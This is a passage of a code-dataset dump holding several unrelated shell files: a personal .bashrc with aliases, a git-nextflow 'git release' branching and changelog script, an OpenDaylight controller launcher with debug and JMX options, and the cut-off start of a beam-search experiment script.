echo "dirsrv_tls_key_file: \"$HERE/${ID}.key\""
echo "dirsrv_tls_files_remote: false"
echo "dirsrv_tls_certificate_trusted: false"
echo --------------------------------
| true |
546cf6cb6c26b38921721b8381b3901407114b3e | Shell | SteDeshain/dotfiles | /dotfiles/bashrc | UTF-8 | 914 | 2.890625 | 3 | [] | no_license | #
# ~/.bashrc
#
# If not running interactively, don't do anything
[[ $- != *i* ]] && return
alias ls='ls --color=auto'
#PS1='[\u@\h \W]\$ '
export PS1='\[\033[01;32m\]\u@\h\[\033[00m\]\[\033[0;33m\][\t]\[\033[01;34m\]\w\[\033[00m\]\$ '
# alias to restart iwd.service
alias fixwifi='sudo systemctl restart iwd.service'
# alias to ping to www.baidu.com for testing the network connection
alias testinet='ping www.baidu.com'
# alias to add executable permissions to a file
alias addx='chmod +x'
# alias to set screen layout
alias sd='~/.screenlayout/dual-with-desktop-monitor.sh && ~/.fehbg'
alias stv='~/.screenlayout/dual-with-tv.sh && ~/.fehbg'
alias stvs='~/.screenlayout/dual-with-tv-slant.sh && ~/.fehbg'
alias ss='~/.screenlayout/single-monitor.sh && ~/.fehbg'
# show tty-clock
alias clock='tty-clock -s -c -n'
# alias to refresh current pwd
alias fr='cd $(pwd)'
alias lg='lazygit'
alias ra='ranger'
| true |
4227a7263b0c5b8145c77a9bf89367ecef154b82 | Shell | LeaveAirykson/git-nextflow | /commands/git-release | UTF-8 | 17,247 | 4.125 | 4 | [] | no_license | #!/bin/bash
# shellcheck disable=SC2063,SC2129,SC2181,SC2162
# Usage:
# git release create|c version
# # git release publish|p version
# # git release finish|f version
red="\033[31m"
green="\033[32m"
yellow="\033[33m"
normal="\033[0m"
# =================================
# DEFINE VARIABLES/DEFAULTS
# =================================
# Set default subcommand
CMD=${1:-create}
# make sure the aliases trigger the right
# subcommand
case "$CMD" in
c | create)
CMD='create'
;;
p | publish)
CMD='publish'
;;
f | finish)
CMD='finish'
;;
esac
# get the settings from git config
RELEASEPREFIX=$(git config --get nextflow.prefix.release || echo 'release/')
NEXTBRANCH=$(git config --get nextflow.branch.next || echo 'develop')
MAINBRANCH=$(git config --get nextflow.branch.main || echo 'master')
VERSIONPREFIX=$(git config --get nextflow.prefix.version || echo 'v')
STRATEGY=$(git config --get nextflow.general.strategy || echo 'alternate')
COMPAREURL=$(git config --get nextflow.general.compareurl)
COMMITURL=$(git config --get nextflow.general.commiturl)
TICKETURL=$(git config --get nextflow.general.ticketurl)
TICKETPATTERN=$(git config --get nextflow.prefix.ticket)
TMPRELEASEMSG="_tmp-release-message.md"
HASREMOTE=0
# determine if a remote exists at all
if grep 'remote' .git/config &>/dev/null; then
HASREMOTE=1
fi
# make sure the 'next' branch exists
# use the 'main' branch as a fallback
if ! git rev-parse --quiet --verify "$NEXTBRANCH" &>/dev/null; then
NEXTBRANCH=$MAINBRANCH
fi
# build final versiontag name and branch name
VERSIONNUMBER=$2
# tag name for new version
VERSIONTAG=${VERSIONPREFIX}${VERSIONNUMBER}
# the new release/ branch
RELEASEBRANCH="${RELEASEPREFIX}${VERSIONTAG}"
# tests for a clean state
WORKINGDIRDIRTY=$(git status --porcelain)
CURRENTBRANCH=$(git branch --show-current)
# do work based on used strategy option
if [ "$STRATEGY" == "alternate" ]; then
# this will set the LASTVERSION and CURRENTVERSION based on
# annotated tags and data from package.json
LASTVERSION="$(git rev-list --max-parents=0 HEAD)"
CURRENTVERSION=$(cat package.json | grep version | head -1 | awk -F: '{ print $2 }' | sed 's/[",]//g' | tr -d '[[:space:]]')
if git describe --abbrev=0 "$MAINBRANCH" &>/dev/null; then
LASTVERSION=$(git describe --abbrev=0 "$MAINBRANCH")
fi
else
# third parameter is used as a reference to branch off from.
NEXTBRANCH=${3:-$NEXTBRANCH}
fi
# =================================
# FUNCTIONS
# =================================
# Print the command synopsis for both workflow strategies to stdout.
usage() {
	printf '%s\n' \
		"Usage:" \
		"git release create|c [version] [commit]" \
		"" \
		"git release publish|p [version]" \
		"git release finish|f [version]" \
		"" \
		"With 'alternate' strategy:" \
		"Usage:" \
		"git release create|c [version]" \
		"" \
		"git release finish|f" \
		""
}
# creates a release branch and optionally pushes it to the remote
function createRelease {
# assume current branch is a release/ branch
# if no version number is given
if [ -z "$VERSIONNUMBER" ]; then
echo -e "${red}⮕ ERROR:${normal} No release name given!"
exit 1
fi
# make sure version does not start with tag prefix
# but instead represents a valid semver syntax or npm version option.
if [[ ${VERSIONNUMBER:0:1} == "$VERSIONPREFIX" ]]; then
echo -e "${red}⮕ ERROR:${normal} Version starts with version tag prefix: '$VERSIONPREFIX'.${normal}"
echo -e "This is not allowed.\nUse full semver syntax like: 1.2.0"
echo -e "Or if you use alternate strategy, any of these npm version options:\nmajor, minor, patch."
exit 1
fi
case $STRATEGY in
alternate)
# make sure to checkout 'next' branch
if [ ! "$CURRENTBRANCH" == "$NEXTBRANCH" ]; then
git checkout "$NEXTBRANCH"
fi
# use npm version if package.json exists
if [ -f package.json ]; then
echo -e "${yellow}⮕${normal} Bump package version"
VERSION=$(npm --silent --no-git-tag-version version "$VERSIONNUMBER")
VERSIONTAG=$(echo "$VERSION" | tail -1)
RELEASEBRANCH="${RELEASEPREFIX}${VERSIONTAG}"
else
# warn if npm version param is given but no package.json found
if [[ $VERSIONNUMBER == 'major' || $VERSIONNUMBER == 'minor' || $VERSIONNUMBER == 'patch' ]]; then
echo -e "${red}⮕ ERROR:${normal} No package.json file found!${normal}"
exit 1
fi
fi
# checkout tmp release/ branch
echo -e "${yellow}⮕${normal} Create new release branch '${RELEASEBRANCH}'"
git checkout -b "$RELEASEBRANCH" "$NEXTBRANCH"
# extract version number without prefix
VERSION=${VERSIONTAG/#$VERSIONPREFIX/}
writeChangelogAlternate "$VERSION" &&
git add --all &&
git commit -m "Add release data to CHANGELOG" &&
echo -e "\n${green}⮕ Release branch $VERSION created.${normal}" &&
echo -e "Continue with updating the CHANGELOG.md and then call:\ngit release f"
exit 0
;;
*)
# checkout release/vxxx branch
git checkout -b "$RELEASEBRANCH" "$NEXTBRANCH"
echo "Make sure to publish the release if its not finished yet so others can add commits to it."
;;
esac
}
# Push the release branch to origin and set it as upstream so other
# contributors can add commits before the release is finished.
# Reads the global RELEASEBRANCH computed near the top of the script.
function publishRelease {
	git push -u origin "$RELEASEBRANCH"
}
# merges release branch into develop and creates
# fast forward merge into master to create release tag.
function finishRelease {
# assume current branch is a release/ branch
# if no version number is given
if [ -z "$VERSIONNUMBER" ]; then
# use current branch as the target
RELEASEBRANCH=$CURRENTBRANCH
# extract version tag from release/vX.X.X branch
VERSIONTAG=${RELEASEBRANCH/"$RELEASEPREFIX"/''}
# Make sure the branch starts with the release/ prefix
# otherwise abort and force manual usage over [version] parameter.
if [[ ! "$RELEASEBRANCH" =~ $RELEASEPREFIX ]]; then
echo -e "${red}⮕ ERROR:${normal} Couldn't find the right release branch.${normal}"
echo -e "Please give either a version name like this:"
echo -e "git release finish 1.5.0"
echo -e "or checkout the branch you want to finish."
usage
exit 1
fi
fi
# checkout release/vxxx branch
git checkout "$RELEASEBRANCH"
# this will set the LASTVERSION to the last
# annotated tag
if git describe --abbrev=0 "$MAINBRANCH" &>/dev/null; then
# get last annotated tag (= version tags)
LASTVERSION=$(git describe --abbrev=0 "$MAINBRANCH")
# use first commit as fallback if no version exists
else
# tell user there is no recent version
LASTVERSION='false'
echo "No recent version found."
echo "Using full history as reference."
fi
echo -e "Release: $RELEASEBRANCH"
echo -e "Version tag: $VERSIONTAG"
# write a changelog if needed
echo ""
read -p "Create CHANGELOG entry (Y/n)? " autocreateChangelog
if [ "$autocreateChangelog" == "Y" ]; then
# autocreate changelog from git log
createChangelogFromLog
# ask user if he wants to edit the changelog entry
echo -e "\n"
read -p "Do you want to edit the entry (Y/n)? " openChangelog
if [ "$openChangelog" == "Y" ]; then
nano _tmp-release-note.txt
fi
# finalize changelog
writeChangelog
# add it to the release commit
git add CHANGELOG.md
fi
# get tmp changelog if any
if [ -f _tmp-release-note.txt ]; then
RELEASENOTES="$(cat _tmp-release-note.txt)"
# remove tmp note
rm _tmp-release-note.txt
else
# use an empty release note as fallback
RELEASENOTES=''
fi
# write version inside a .version file
# and add it to the next commit
echo "$VERSIONTAG" >.version && git add .version
# Create final commit with updated changelog
git commit -m "Release $VERSIONTAG" -m "$RELEASENOTES"
# merge release/vxxx into develop
git checkout "$NEXTBRANCH"
git merge "$RELEASEBRANCH"
# update master with release changes from develop
git checkout "$MAINBRANCH"
git merge "$NEXTBRANCH" -m "Release $VERSIONTAG"
# Create version tag on master
git tag -a "$VERSIONTAG" "$NEXTBRANCH" -m "Release $VERSIONTAG" -m "$RELEASENOTES"
if [ $HASREMOTE == 1 ]; then
# push the branches
git push origin "$NEXTBRANCH" --follow-tags
git push origin "$MAINBRANCH" --follow-tags
fi
if [ $? -eq 0 ]; then
echo -e "⮕ ${green}Release $VERSIONTAG successfully finished!${normal}"
else
echo -e "${red}⮕ ERROR:${normal} Problems occured during creation of release:${normal} $VERSIONTAG"
exit 1
fi
# Remove release branch as its fully merged into develop
git branch -d "$RELEASEBRANCH"
# finally check out 'next' branch so users don't accidentaly
# continue working on the 'main' branch.
git checkout "$NEXTBRANCH" &>/dev/null
}
# used by 'alternate' strategy.
# Finish a release: squash-merge the current release/* branch into
# $NEXTBRANCH as one "Release <version>" commit, tag it, merge $NEXTBRANCH
# into $MAINBRANCH, push when a remote exists, then delete the release branch.
# Globals read: CURRENTBRANCH RELEASEPREFIX CURRENTVERSION NEXTBRANCH
#               MAINBRANCH VERSIONPREFIX HASREMOTE (+ color variables).
function finishReleaseAlternate {
    # make sure user is on a release branch otherwise warn and exit
    if [[ ! $CURRENTBRANCH == $RELEASEPREFIX* ]]; then
        echo -e "${red}⮕ ERROR:${normal} Current branch '${CURRENTBRANCH}' is not a valid release branch! Check out the right one and try again."
        exit 1
    else
        RELEASEBRANCH=$CURRENTBRANCH
    fi
    git checkout "$RELEASEBRANCH"
    echo -e "${yellow}⮕${normal} Create release ${CURRENTVERSION}"
    # make sure everything is added
    # (any uncommitted change is auto-committed so the squash merge is complete)
    if [ -n "$(git status --porcelain)" ]; then
        echo -e "${yellow}⮕${normal} Changes detected - committing..."
        git add --all
        git commit -m "Clean working directory for ${CURRENTVERSION}"
    fi
    echo -e "${yellow}⮕${normal} Squash merge release into '${NEXTBRANCH}'"
    # squash merge release branch into 'next'
    git checkout "$NEXTBRANCH"
    git merge --squash "$RELEASEBRANCH"
    # commit the merge as release commit
    echo -e "${yellow}⮕${normal} Commit squash merge"
    git add --all
    git commit -m "Release ${CURRENTVERSION}"
    # add the release tag to it
    echo -e "${yellow}⮕${normal} Create release tag ${VERSIONPREFIX}${CURRENTVERSION}"
    git tag -a "${VERSIONPREFIX}${CURRENTVERSION}" -m "Release ${CURRENTVERSION}"
    # merge into 'main' branch
    echo -e "${yellow}⮕${normal} Merge release into '$NEXTBRANCH'"
    git checkout "$MAINBRANCH"
    git merge "$NEXTBRANCH"
    # push if remote exists
    if [ $HASREMOTE == 1 ]; then
        echo -e "${yellow}⮕${normal} Push release"
        git push --follow-tags
    fi
    # check for errors otherwise delete release branch
    # NOTE(review): $? here is the status of the preceding `if` compound —
    # the push status when HASREMOTE==1, otherwise 0. Failures of the
    # earlier checkout/merge/tag steps are NOT caught by this check.
    if [ $? -eq 0 ]; then
        # delete release/ branch
        echo -e "${yellow}⮕${normal} Delete '$RELEASEBRANCH'"
        git branch -D "$RELEASEBRANCH"
        # finally check out 'next' branch so users don't
        # continue working on the 'main' branch
        echo -e "${yellow}⮕${normal} Checkout '$NEXTBRANCH'"
        git checkout "$NEXTBRANCH" &>/dev/null
        # final finish message
        echo -e "${green}⮕ Release ${CURRENTVERSION} finished!${normal}"
    else
        echo -e "${red}⮕ ERROR:${normal} Problems occured during creation of release:${normal} $CURRENTVERSION"
        exit 1
    fi
}
# Prepend the pending release notes to CHANGELOG.md.
# Reads:  _tmp-release-note.txt (note body) and the existing CHANGELOG.md.
# Writes: CHANGELOG.md with a new "## $VERSIONTAG" entry on top, then prints
#         a success line for the user.
function writeChangelog {
    local scratch=_tmp-release-message.md
    # Assemble the new changelog in a scratch file: headline, note body,
    # a blank separator line, then the previous changelog content.
    {
        echo "## ${VERSIONTAG}"
        cat _tmp-release-note.txt
        echo -e "\n"
        cat CHANGELOG.md
    } >"$scratch"
    # Replace the old changelog with the assembled one in a single move.
    mv "$scratch" CHANGELOG.md
    echo -e "⮕ ${green}Successfully added changelog entry for:${normal} $VERSIONTAG."
}
# Dump one bullet line ("- <subject>") per commit that belongs to the
# upcoming release into _tmp-release-note.txt, then echo the file so the
# user can review it. When $LASTVERSION is the literal string 'false'
# (no previous release tag), the whole history of $NEXTBRANCH is used;
# otherwise only commits between $LASTVERSION and $NEXTBRANCH.
createChangelogFromLog() {
    local range
    if [ "$LASTVERSION" = 'false' ]; then
        # no earlier release exists: take the full branch history
        range="$NEXTBRANCH"
    else
        # limit the log to commits made since the last release tag
        range="$LASTVERSION...$NEXTBRANCH"
    fi
    git log --pretty=format:"- %s" "$range" >_tmp-release-note.txt
    echo "Content:"
    cat _tmp-release-note.txt
}
# Normalise one raw changelog chunk passed as $1:
#   * join all physical lines into a single line,
#   * turn every '++!!' marker back into a "\n- " bullet separator,
#   * when ticket linking is configured (TICKETURL and TICKETPATTERN both
#     set), additionally strip the _body_ markers and #resolve/#close
#     keywords and wrap ticket ids into markdown links.
function cleanChangelogEntry {
    local flattened
    # Flatten to one line, then re-introduce bullet line breaks.
    flattened=$(echo "$1" | tr '\n' ' ' | sed 's/\+\+\!\!/\n-/g')
    if [[ -n $TICKETURL ]] && [[ -n $TICKETPATTERN ]]; then
        # Ticket mode: scrub body markers/keywords and linkify ticket ids.
        printf '%s' "$flattened" | sed 's/_body__body_//' | sed 's/\#resolve//' | sed 's/\#close//' | sed "s~\(${TICKETPATTERN}\S*\)~(\[\1\](${TICKETURL}\1))~" | sed 's/_body__//' | sed 's/__body_//'
    else
        printf '%s' "$flattened"
    fi
}
# Automatically prepends an entry in the CHANGELOG.md
# file based on the commit messages between the last release tag.
# Will prompt the user if they want to autocreate the
# entry and if they want to manually edit it afterwards.
# Arguments: $1 - version string for the new entry.
# Globals read: LASTVERSION NEXTBRANCH COMMITURL COMPAREURL TICKETURL
#               TICKETPATTERN VERSIONPREFIX TMPRELEASEMSG (+ color vars).
# Commits tagged [fix]/[change]/[add]/[break] in their subject are grouped
# into Fixed/Changed/Added/Breaking sections; everything else goes to Misc.
function writeChangelogAlternate {
    VERSION="$1"
    DATE=$(date +%Y-%m-%d)
    HEADLINE="# ${VERSION} - ${DATE}"
    echo -e "${yellow}⮕${normal} Update CHANGELOG.md for $VERSION"
    # Build the per-commit suffix: "(hash)" or a markdown commit link when
    # COMMITURL (with a {commit} placeholder) is configured.
    if [[ -n $COMMITURL ]]; then
        COMMITLINK=${COMMITURL/"{commit}"/"%H"}
        COMMITLINK="([%h]($COMMITLINK))"
    else
        COMMITLINK="(%h)"
    fi
    echo "last version: $LASTVERSION"
    # change commit format to support ticket extraction
    # (the commit body %b is wrapped in _body_ markers that
    # cleanChangelogEntry later strips again)
    if [[ -n $TICKETURL ]] && [[ -n $TICKETPATTERN ]]; then
        COMMITLINK="${COMMITLINK} _body__%b__body_"
    fi
    # '++!!' is a private line-break marker that survives the flattening
    # done inside cleanChangelogEntry.
    LOG_ALL=$(git log --pretty=format:"++!! %s $COMMITLINK" "$LASTVERSION".."$NEXTBRANCH")
    LOG_ALL=$(cleanChangelogEntry "$LOG_ALL")
    # Split the bullet list into sections by subject tag.
    LOG_FIXED=$(echo "$LOG_ALL" | grep '\[fix\]')
    LOG_CHANGED=$(echo "$LOG_ALL" | grep '\[change\]')
    LOG_ADDED=$(echo "$LOG_ALL" | grep '\[add\]')
    LOG_BREAKS=$(echo "$LOG_ALL" | grep '\[break\]')
    LOG_MISC=$(echo "$LOG_ALL" | grep -v "\[change\|\[fix\|\[add\|\[break")
    # use url to branch comparison between old and new release
    if [[ -n $COMPAREURL ]]; then
        COMPAREURL=${COMPAREURL/"{old}"/$LASTVERSION}
        COMPAREURL=${COMPAREURL/"{new}"/$VERSIONPREFIX$VERSION}
        HEADLINE="# [${VERSION}](${COMPAREURL}) - ${DATE}"
    fi
    # start default changelog block
    # NOTE(review): in "${VAR// \[tag\]/''}" the replacement is the two
    # literal apostrophe characters, not an empty string — every removed
    # tag leaves '' behind in the output. Probably unintended; confirm.
    TMPCONTENT="$HEADLINE"
    if [ -n "$LOG_BREAKS" ]; then
        LOG_BREAKS="${LOG_BREAKS// \[break\]/''}"
        TMPCONTENT+="\n\n### Breaking changes\n\n$LOG_BREAKS"
    fi
    if [ -n "$LOG_FIXED" ]; then
        LOG_FIXED="${LOG_FIXED// \[fix\]/''}"
        TMPCONTENT+="\n\n### Fixed\n\n$LOG_FIXED"
    fi
    if [ -n "$LOG_ADDED" ]; then
        LOG_ADDED="${LOG_ADDED// \[add\]/''}"
        TMPCONTENT+="\n\n### Added\n\n$LOG_ADDED"
    fi
    if [ -n "$LOG_CHANGED" ]; then
        LOG_CHANGED="${LOG_CHANGED// \[change\]/''}"
        TMPCONTENT+="\n\n### Changed\n\n$LOG_CHANGED"
    fi
    if [ -n "$LOG_MISC" ]; then
        TMPCONTENT+="\n\n### Misc\n\n$LOG_MISC"
    fi
    # add final new line
    TMPCONTENT+="\n"
    # sanitize multiple whitespaces
    # (tr -s squeezes repeated spaces anywhere, including inside subjects)
    TMPCONTENT=$(echo "$TMPCONTENT" | tr -s ' ')
    # put content into tmp changelog (echo -e expands the \n escapes above)
    echo -e "$TMPCONTENT" >$TMPRELEASEMSG
    # attach old changelog content if it exists
    if [ -f CHANGELOG.md ]; then
        cat CHANGELOG.md >>$TMPRELEASEMSG
    fi
    # overwrite original changelog file
    # and delete tmp files
    mv $TMPRELEASEMSG CHANGELOG.md
}
# =================================
# CHECKS
# =================================
# Pre-flight sanity checks; each failure prints a diagnostic and exits 1.
# abort if working directory is dirty
# (only enforced for the 'default' strategy; 'alternate' auto-commits)
if [ "$WORKINGDIRDIRTY" ] && [ "$STRATEGY" == "default" ]; then
    echo -e "${red}⮕ ERROR:${normal} Your working directory is dirty!\n"
    git status
    exit 1
fi
# make sure the branches are up to date
# (compares local HEAD with the configured upstream @{u} of $NEXTBRANCH;
# only meaningful when a remote exists)
if git checkout "$NEXTBRANCH" &>/dev/null &&
    [ $HASREMOTE == 1 ] &&
    [ "$(git rev-parse HEAD)" != "$(git rev-parse @{u})" ]; then
    echo -e "${red}⮕ERR:${normal} HEAD and origin/HEAD are deviated!${normal}"
    echo -e "Make sure you merged/pulled new commits."
    echo ""
    git status
    exit 1
fi
# abort if version tag already exists
if [ "$(git tag -l "$VERSIONTAG")" ]; then
    echo -e "${red}⮕ ERROR:${normal} Version already exists!${normal}\n"
    git show "$VERSIONTAG"
    exit 1
fi
# =================================
# EXECUTION
# =================================
# Dispatch on the requested sub-command; each handler exits the script.
case "$CMD" in
create)
    createRelease
    exit
    ;;
publish)
    # 'alternate' has no separate publish step — finishing pushes.
    if [ "$STRATEGY" == 'alternate' ]; then
        echo "Publish does not work with 'alternate' strategy, because it will be published during 'git release f'."
    else
        publishRelease
    fi
    exit
    ;;
finish)
    if [ "$STRATEGY" == 'alternate' ]; then
        finishReleaseAlternate
    else
        finishRelease
    fi
    exit
    ;;
esac
| true |
ef71879ca82fa23b52146b8b218cedc6d9fd1b29 | Shell | NachtZ/bohatei | /backend/controller/toolkit/main/src/main/resources/run.sh | UTF-8 | 8,249 | 3.734375 | 4 | [
"BSD-2-Clause"
] | permissive | #!/bin/bash
# Detect the host OS so that path canonicalisation and JAVA_HOME discovery
# can use the platform-appropriate tools below.
platform='unknown'
unamestr=`uname`
if [[ "$unamestr" == 'Linux' ]]; then
   platform='linux'
elif [[ "$unamestr" == 'Darwin' ]]; then
   platform='osx'
fi
if [[ $platform == 'linux' ]]; then
    # GNU readlink -f canonicalises the script path in one call.
    fullpath=`readlink -f $0`
    if [[ -z ${JAVA_HOME} ]]; then
        # Find the actual location of the Java launcher:
        java_launcher=`which java`
        java_launcher=`readlink -f "${java_launcher}"`
        # Compute the Java home from the location of the Java launcher:
        export JAVA_HOME="${java_launcher%/bin/java}"
    fi
elif [[ $platform == 'osx' ]]; then
    # macOS readlink has no -f, so resolve the symlink chain manually.
    TARGET_FILE=$0
    cd `dirname "$TARGET_FILE"`
    TARGET_FILE=`basename $TARGET_FILE`
    # Iterate down a (possible) chain of symlinks
    while [ -L "$TARGET_FILE" ]
    do
        TARGET_FILE=`readlink "$TARGET_FILE"`
        cd `dirname "$TARGET_FILE"`
        TARGET_FILE=`basename "$TARGET_FILE"`
    done
    # Compute the canonicalized name by finding the physical path
    # for the directory we're in and appending the target file.
    PHYS_DIR=`pwd -P`
    RESULT=$PHYS_DIR/$TARGET_FILE
    fullpath=$RESULT
    [[ -z ${JAVA_HOME} ]] && [[ -x "/usr/libexec/java_home" ]] && export JAVA_HOME=`/usr/libexec/java_home -v 1.7`;
fi
# Refuse to continue without a usable JVM. (exit -1 shows up as status 255.)
[[ -z ${JAVA_HOME} ]] && echo "Need to set JAVA_HOME environment variable" && exit -1;
[[ ! -x ${JAVA_HOME}/bin/java ]] && echo "Cannot find an executable \
JVM at path ${JAVA_HOME}/bin/java check your JAVA_HOME" && exit -1;
# Install and data directories default to the script's own directory but
# can be overridden through ODL_BASEDIR / ODL_DATADIR.
if [ -z ${ODL_BASEDIR} ]; then
    basedir=`dirname "${fullpath}"`
else
    basedir=${ODL_BASEDIR}
fi
if [ -z ${ODL_DATADIR} ]; then
    datadir=`dirname "${fullpath}"`
else
    datadir=${ODL_DATADIR}
fi
# Print the command-line synopsis on stdout and terminate with status 1.
usage() {
    local synopsis="Usage: $0 [-jmx] [-jmxport <num>] [-debug] [-debugsuspend] [-debugport <num>] [-start [<console port>]] [-stop] [-status] [-console] [-help] [-agentpath:<path to lib>] [<other args will automatically be used for the JVM>]"
    printf '%s\n' "$synopsis"
    exit 1
}
# The daemon PID file lives under $TMP when set, otherwise under /tmp.
if [ -z ${TMP} ]; then
    pidfile="/tmp/opendaylight.PID"
else
    pidfile="${TMP}/opendaylight.PID"
fi
# Option state, pre-loaded with defaults (flags are 0/1, ports numeric).
debug=0
debugsuspend=0
debugport=8000
debugportread=""
startdaemon=0
daemonport=2400
daemonportread=""
jmxport=1088
jmxportread=""
startjmx=0
stopdaemon=0
statusdaemon=0
consolestart=1
dohelp=0
extraJVMOpts=""
agentPath=""
unknown_option=0
# Hand-rolled option parser. Port-taking options validate their argument is
# numeric; -D*/-X* flags are passed through to the JVM verbatim; -console is
# accepted but ignored because console mode is already the default.
while true ; do
    case "$1" in
        -debug) debug=1; shift ;;
        -jmx) startjmx=1; shift ;;
        -debugsuspend) debugsuspend=1; shift ;;
        -debugport) shift; debugportread="$1"; if [[ "${debugportread}" =~ ^[0-9]+$ ]] ; then debugport=${debugportread}; shift; else echo "-debugport expects a number but was not found"; exit -1; fi;;
        -jmxport) shift; jmxportread="$1"; if [[ "${jmxportread}" =~ ^[0-9]+$ ]] ; then jmxport=${jmxportread}; shift; else echo "-jmxport expects a number but was not found"; exit -1; fi;;
        -start) startdaemon=1; shift; daemonportread="$1"; if [[ "${daemonportread}" =~ ^[0-9]+$ ]] ; then daemonport=${daemonportread}; shift; fi;;
        -stop) stopdaemon=1; shift ;;
        -status) statusdaemon=1; shift ;;
        -console) shift ;;
        -help) dohelp=1; shift;;
        -D*) extraJVMOpts="${extraJVMOpts} $1"; shift;;
        -X*) extraJVMOpts="${extraJVMOpts} $1"; shift;;
        -agentpath:*) agentPath="$1"; shift;;
        "") break ;;
        *) echo "Unknown option $1"; unknown_option=1; shift ;;
    esac
done
# Unknown Options and help
# (usage prints the synopsis and exits 1)
if [ "${unknown_option}" -eq 1 ]; then
    usage
fi
if [ "${dohelp}" -eq 1 ]; then
    usage
fi
# Validate debug port
# (non-privileged TCP port range check)
if [[ "${debugport}" -lt 1024 ]] || [[ "${debugport}" -gt 65535 ]]; then
    echo "Debug Port not in the range [1024,65535] ${debugport}"
    exit -1
fi
# Validate daemon console port
if [[ "${daemonport}" -lt 1024 ]] || [[ "${daemonport}" -gt 65535 ]]; then
    echo "Daemon console Port not in the range [1024,65535] value is ${daemonport}"
    exit -1
fi
# Validate jmx port
if [[ "${jmxport}" -lt 1024 ]] || [[ "${jmxport}" -gt 65535 ]]; then
    echo "JMX Port not in the range [1024,65535] value is ${jmxport}"
    exit -1
fi
# Debug options
# (-debugsuspend wins over -debug: same JDWP agent, but suspend=y makes
# the JVM wait for a debugger to attach before starting)
if [ "${debugsuspend}" -eq 1 ]; then
    extraJVMOpts="${extraJVMOpts} -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=${debugport}"
elif [ "${debug}" -eq 1 ]; then
    extraJVMOpts="${extraJVMOpts} -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=${debugport}"
fi
# Add JMX support
# (remote JMX without authentication or SSL — local/dev use only)
if [ "${startjmx}" -eq 1 ]; then
    extraJVMOpts="${extraJVMOpts} -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.port=${jmxport} -Dcom.sun.management.jmxremote"
fi
########################################
# Now add to classpath the OSGi JAR
########################################
# CLASSPATH is the plain Java classpath; FWCLASSPATH is the same set of
# jars as a comma-separated list of file: URLs for the OSGi framework.
CLASSPATH=${CLASSPATH}:${basedir}/lib/org.eclipse.osgi-3.8.1.v20120830-144521.jar
FWCLASSPATH=file:"${basedir}"/lib/org.eclipse.osgi-3.8.1.v20120830-144521.jar
########################################
# Now add the extensions
########################################
# Extension 1: this is used to be able to convert all the
# bundleresouce: URL in file: so packages that are not OSGi ready can
# still work. Notably this is the case for spring classes
CLASSPATH=${CLASSPATH}:${basedir}/lib/org.eclipse.virgo.kernel.equinox.extensions-3.6.0.RELEASE.jar
FWCLASSPATH=${FWCLASSPATH},file:${basedir}/lib/org.eclipse.virgo.kernel.equinox.extensions-3.6.0.RELEASE.jar
########################################
# Now add the launcher
########################################
CLASSPATH=${CLASSPATH}:${basedir}/lib/org.eclipse.equinox.launcher-1.3.0.v20120522-1813.jar
FWCLASSPATH=${FWCLASSPATH},file:${basedir}/lib/org.eclipse.equinox.launcher-1.3.0.v20120522-1813.jar
cd $basedir
# -stop: kill the PID recorded in the pidfile and remove the file.
if [ "${stopdaemon}" -eq 1 ]; then
    if [ -e "${pidfile}" ]; then
        daemonpid=`cat "${pidfile}"`
        kill "${daemonpid}"
        rm -f "${pidfile}"
        echo "Controller with PID: ${daemonpid} -- Stopped!"
        exit 0
    else
        echo "Doesn't seem any Controller daemon is currently running"
        exit -1
    fi
fi
# -status: report whether the recorded PID is still alive; clean up a
# stale pidfile when the process is gone.
if [ "${statusdaemon}" -eq 1 ]; then
    if [ -e "${pidfile}" ]; then
        daemonpid=`cat "${pidfile}"`
        ps -p ${daemonpid} > /dev/null
        daemonexists=$?
        if [ "${daemonexists}" -eq 0 ]; then
            echo "Controller with PID: ${daemonpid} -- Running!"
            exit 0
        else
            echo "Controller with PID: ${daemonpid} -- Doesn't seem to exist"
            rm -f "${pidfile}"
            exit 1
        fi
    else
        echo "Doesn't seem any Controller daemon is currently running, at least no PID file has been found"
        exit -1
    fi
fi
# Escape spaces in the paths handed to the JVM.
# NOTE(review): inside backquotes '\\ ' collapses to '\ ', so this sed
# replaces each space with "backslash space" — verify it interacts
# correctly with the quoting in the java invocations below.
iotmpdir=`echo "${datadir}" | sed 's/ /\\ /g'`
bdir=`echo "${basedir}" | sed 's/ /\\ /g'`
confarea=`echo "${datadir}" | sed 's/ /\\ /g'`
fwclasspath=`echo "${FWCLASSPATH}" | sed 's/ /\\ /g'`
# -start: launch the Equinox-based controller in the background with a
# telnet console on ${daemonport}, and record its PID.
if [ "${startdaemon}" -eq 1 ]; then
    if [ -e "${pidfile}" ]; then
        echo "Another instance of controller running, check with $0 -status"
        exit -1
    fi
    $JAVA_HOME/bin/java ${extraJVMOpts} \
        ${agentPath} \
        -Djava.io.tmpdir="${iotmpdir}/work/tmp" \
        -Dosgi.install.area="${bdir}" \
        -Dosgi.configuration.area="${confarea}/configuration" \
        -Dosgi.frameworkClassPath="${fwclasspath}" \
        -Dosgi.framework=file:"${bdir}/lib/org.eclipse.osgi-3.8.1.v20120830-144521.jar" \
        -Djava.awt.headless=true \
        -classpath "${CLASSPATH}" \
        org.eclipse.equinox.launcher.Main \
        -console ${daemonport} \
        -consoleLog &
    daemonpid=$!
    echo ${daemonpid} > ${pidfile}
# Default mode: run in the foreground with an interactive OSGi console.
elif [ "${consolestart}" -eq 1 ]; then
    if [ -e "${pidfile}" ]; then
        echo "Another instance of controller running, check with $0 -status"
        exit -1
    fi
    java ${extraJVMOpts} \
        ${agentPath} \
        -Djava.io.tmpdir="${iotmpdir}/work/tmp" \
        -Dosgi.install.area="${bdir}" \
        -Dosgi.configuration.area="${confarea}/configuration" \
        -Dosgi.frameworkClassPath="${fwclasspath}" \
        -Dosgi.framework=file:"${bdir}/lib/org.eclipse.osgi-3.8.1.v20120830-144521.jar" \
        -Djava.awt.headless=true \
        -classpath "${CLASSPATH}" \
        org.eclipse.equinox.launcher.Main \
        -console \
        -consoleLog
fi
| true |
0b1bf1cd12b63fe89fcc6da009075f0d7570898b | Shell | Kaixin-Wu/nematus_simple | /script/beam_search_exp.sh | UTF-8 | 530 | 2.640625 | 3 | [] | no_license | model=../data/c2e.180W.gen/model/finetune/model.npz.best_bleu
# Source sentences and reference data for the MT08 test set.
input=../data/c2e.180W.gen/test/mt08/c.utf8.token
# Beam widths to sweep over.
